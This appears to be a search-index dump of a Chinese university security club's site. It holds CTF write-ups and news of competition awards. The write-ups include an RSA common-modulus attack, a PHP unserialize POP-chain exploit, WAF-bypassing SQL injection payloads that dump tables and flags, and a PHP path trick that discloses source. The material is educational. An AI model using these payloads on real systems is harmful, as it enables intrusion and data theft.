\u6709$n=pq$ \u7531\u6b27\u62c9\u51fd\u6570\u7684\u5b9a\u4e49\u5f97$\\varphi (n)=\\varphi (p)\\varphi (q)=(p-1)(q-1)$
\u4efb\u610f\u9009\u4e00\u6b63\u6574\u6570e \u4f7f\u5f97$gcd(e,\\varphi (n))=1$
$d$ \u6ee1\u8db3 $(de)\\space mod \\space \\varphi (n)=1$ \u5373 $(de) = k\\varphi (n)+1,k \\ge 1$
\u5c06$m$\u52a0\u5bc6\u4e3a$c$ $c=m^e\\space mod \\space n$
\u5c06$c$\u89e3\u5bc6\u4e3a$m$
$m=c^d\\space mod \\space n$
\u8bc1\u660e $$ \\because c=m^e\\space mod \\space n\\ \\therefore c \\equiv m^e\\space mod \\space n\\ \\therefore c^d \\equiv m^{ed}\\space mod \\space n\\ \\therefore c^d \\equiv m^{k\\varphi (n)+1}\\space mod \\space n\\ \\space\\ \u5f53gcd(m,n)=1\u65f6\u6709:\\ c^d \\equiv (m^{\\varphi (n)})^{k}\\times m\\space mod \\space n\\ c^d \\equiv 1^k\\times m\\space mod \\space n\\ c^d \\equiv m\\space mod \\space n\\ \\space\\ \u5f53gcd(m,n)\\ne1\u65f6\u6709:\\ \u6b64\u65f6\u5fc5\u5b9a\u6709gcd(q,m)=1\u6216gcd(p,m)=1\\ \u8bbem=m^{'}p \\space \u6b64\u65f6 gcd(q,m)=1\\ c^d \\equiv m^{k\\varphi (p)\\varphi (q)}\\times m\\space mod\\space n\\ c^d \\equiv (m^{\\varphi(q)\\varphi(p)})^{k}\\times m\\space mod \\space n\\ \u53c8\\because m^{\\varphi(q)}\\equiv 1 \\space mod \\space q\\ \\therefore m^{k\\varphi(q)\\varphi(p)}\\equiv 1^{k\\varphi(p)} \\space mod \\space q\\ \\therefore m^{k\\varphi(q)\\varphi(p)}=(k_2q+1) \u4ee3\u5165\u5f97\\ c^d \\equiv (k_2q+1)\\times m\\space mod \\space n\\ c^d \\equiv (k_2m^{'}pq+m)\\times m\\space mod \\space n\\ c^d \\equiv m\\space mod \\space n\\ \u8bc1\u6bd5. $$
\u9644: 1. \u6b27\u62c9\u5b9a\u7406 $$ a^{\\varphi(n)}\\equiv 1\\space mod\\space n,\u5f53gcd(n,a)=1\u4e14n,a\\ge0 $$ \u4e14\u5f53n\u4e3a\u8d28\u6570\u65f6\u4e3a\u8d39\u9a6c\u5c0f\u5b9a\u7406 $$ a^{n-1}\\equiv 1(mod\\space n) $$
\u5171\u6a21\u653b\u51fb\u539f\u7406
$e_1,e_2,n,c_1,c_2$ \u5df2\u77e5 \u4e14 $c_1=m^{e_1}\\space mod \\space n$ $c_2=m^{e_2}\\space mod \\space n$ \u5f53$gcd(e_1,e_2)=1$
\u6709$m=(c_1^{s_1}\\times c_2^{s_2})\\space mod \\space n$ \u5176\u4e2d$e_1s_1+e_2s_2=1$ \u8bc1\u660e $$ m\\ =m^1\\ =m^{e_1s_1+e_2s_2}\\ =(m^{e_1})^{s_1}(m^{e_2})^{s_2}\\ \\equiv c_1^{s_1}c_2^{s_2}\\space mod\\space n\\ \u8bc1\u6bd5. $$
\u6240\u4ee5\u89e3\u5171\u6a21\u9898\u65f6\u53ea\u8981\u7528exgcd\u6c42\u51fa $s_1,s_2$
\u9644: 1. \u8d1d\u7956\u5b9a\u7406 $$ ax+by=gcd(a,b) $$
"},{"location":"ctfnotes/problem-440-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]pop","text":"~~\u4f60\u8fd9\u4e2a\u53d6\u540d\u771f\u7684\u53ef\u4ee5\u7684~~ 1. \u5ba1\u8ba1\u6e90\u7801 2. \u5bfb\u627epop\u94fe
\u77e5\u8bc6\u70b9: \u53d8\u91cf\u540e\u9762\u52a0\u62ec\u53f7\u662f\u52a8\u6001\u8c03\u7528\u51fd\u6570
$abc('asd')\n\u7b49\u4ef7\u4e8e\nasd(abc);\n
unserialize -> w22m.__construct -> w22m.__destruct -> w33m.__toString -> w44m.__construct & w44m.Getflag
\u7f16\u5199exp <?php\nclass w44m\n{\n private $admin = 'aaa';\n protected $passwd = '123456';\n public function __construct()\n {\n $this->admin = 'w44m';\n $this->passwd = '08067';\n }\n public function Getflag()\n {\n if ($this->admin === 'w44m' && $this->passwd === '08067') {\n include('flag.php');\n echo $flag;\n } else {\n echo $this->admin;\n echo $this->passwd;\n echo 'nono';\n }\n }\n}\nclass w33m\n{\n public $w00m;\n public $w22m;\n public function __toString()\n {\n $this->w00m->{$this->w22m}();\n return 0;\n }\n public function __construct(){\n $this->w22m = \"Getflag\";\n $this->w00m = new w44m;\n }\n}\nclass w22m\n{\n public $w00m;\n public function __destruct()\n {\n echo $this->w00m;\n }\n public function __construct()\n {\n $this->w00m = new w33m;\n }\n}\n\n$a = new w22m;\necho \"?w00m=\".urlencode(serialize($a))\n ?>\n
"},{"location":"ctfnotes/problem-442-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]sql","text":" \u4f20\u5165wllm\u53c2\u6570 hint:Want Me? Cross the Waf \u6c99\u7bb1\u7ed5\u8fc7 \u4e3b\u8981\u9650\u5236\u4e3a ban \u7a7a\u683c \u7b49\u53f7 \u9650\u5236\u8f93\u51fa\u5927\u5c0f20\u5b57 exp\u7f16\u5199 exp1(\u67e5\u8be2\u6570\u636e\u8868) ?wllm=-1'union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA/**/like/**/'test_db'%23
\u53ef\u4ee5\u770b\u5230test_db\u5185\u7684\u8868 \u6709LTLT_flag\u548cuser exp2(\u67e5\u8be2\u8868\u5185\u5b57\u6bb5) ?wllm=-1'union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.columns/**/where/**/TABLE_NAME/**/like/**/'LTLT_flag'%23
exp3(\u8f93\u51faflag) ?wllm=-1'union/**/select/**/1,mid(group_concat(flag),1,21),mid(group_concat(flag),21,40)/**/from/**/test_db.LTLT_flag%23
"},{"location":"ctfnotes/problem-444-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]re1","text":" IDA\u53cd\u7f16\u8bd1 \u53d1\u73b0\u53ea\u662f\u505a\u7b80\u5355\u5b57\u7b26\u66ff\u6362 \u5199exp exp #include <iostream>\nusing namespace std;\nstring str2 = \"{34sy_r3v3rs3}\";\nvoid dfs(int now)\n{\n if (now == str2.length() - 1)\n {\n cout << \"NSSCTF\" << str2 << endl;\n return;\n }\n if (str2[now] == 52)\n {\n str2[now] = 97;\n dfs(now + 1);\n str2[now] = 52;\n dfs(now + 1);\n }\n else if (str2[now] == 51)\n {\n str2[now] = 101;\n dfs(now + 1);\n str2[now] = 51;\n dfs(now + 1);\n }\n else\n {\n dfs(now + 1);\n }\n}\nint main()\n{\n freopen(\"ans.txt\", \"w\", stdout);\n dfs(0);\n}\n
\u5f97\u5230flag
"},{"location":"ctfnotes/problem-463-wp/","title":"[\u9e64\u57ce\u676f 2021]EasyP","text":" \u5ba1\u9605\u4ee3\u7801 \u77e5\u8bc6\u70b9: php\u4f1a\u5c06 ' ','.','[','chr(128)-chr(159)'
\u5f53\u505a'_' basename\u51fd\u6570\u9047\u5230\u975eascii\u4f1a\u820d\u5f03 \u5373\u53ef\u6784\u5efaexp
/index.php/utils.php/%ff?show%20source
"},{"location":"ctfnotes/problem-47-wp/","title":"[SWPU 2020]\u5957\u5a03","text":"~~\u8bf4\u597d\u7684\u5957\u5a03\u5462~~ 1. \u4e0b\u8f7d\u5f97\u5230xlsx \u89e3\u538b\u5373\u5f97RC4data.txt
\u548cswpu.xlsx
2. \u89e3\u538bswpu.xlsx
\u5f97esayrc4.xlsx
\u548cRC4key.zip
3. \u53d1\u73b0RC4key.zip
\u9700\u8981\u5bc6\u7801 \u53bbesayrc4.xlsx
\u5bfb\u627e\u7ebf\u7d22 \u53d1\u73b0esayrc4.xlsx
\u65e0\u6cd5\u89e3\u538bHxD
\u6253\u5f00\u5c31\u627e\u5230\u4e86password \u62ffpassword\u89e3\u538bRC4key.zip
\u7136\u540e\u5728\u7ebf\u89e3\u5bc6\u4e0bRC4data.txt
\u5c31\u5f97\u5230flag
"},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5
\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168
\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF
\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster
\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin
\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"CTF
\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002
48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002
\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n
\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01
\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n
360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002
\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u6d77\u62a5\uff1a
\u6bd4\u8d5b\u73b0\u573a\uff1a
\u6bd4\u8d5b\u6392\u884c\u699c\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u73b0\u573a\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"\u6bd4\u8d5b\u89c6\u9891\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a
\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f
